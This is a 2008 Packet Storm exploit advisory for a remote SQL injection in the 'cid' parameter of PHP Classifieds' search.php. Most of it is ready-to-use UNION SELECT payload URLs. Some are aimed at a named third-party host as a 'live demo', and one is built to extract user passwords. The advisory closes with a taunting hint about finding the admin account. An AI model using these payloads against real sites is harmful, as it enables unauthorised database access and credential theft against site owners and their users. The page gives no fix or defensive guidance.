phpclassifiedssearch-sql.txt

2008-11-03T00:00:00
ID PACKETSTORM:71455
Type packetstorm
Reporter d3b4g
Modified 2008-11-03T00:00:00

Description

                                        
                                            ` PHP Classifieds[cid]Remote SQL Injection Vulnerability  
--------------------------------------------------------------------------------  
  
  
----------------------------------------------------------------  
script : PHP Classifieds  
  
script : http://www.preprojects.com/pclphp.asp  
  
Risk : High  
  
----------------------------------------------------------------  
  
Dicovered by : d3b4g  
  
email : bl4ckend[at]gmail[dot]com  
  
Site. www.bl4ck3nd.info  
  
----------------------------------------------------------------  
Exploit : http: //www.target.com/[path]/search.php?cid=-1+union+all+select+1,2,concat_ws(@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*  
  
  
Live demo: http: //www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(@@version),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*  
  
  
For passowrd : http://www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*  
  
  
For admin : [Find it ] :P  
----------------------------------------------------------------  
  
  
----------------------------------------------------------------  
Greetz: str0ke,,Hotlism.org,All my friends  
  
-----------------------------------------------------------------  
Proud to be a maldivian :))  
=======================  
  
`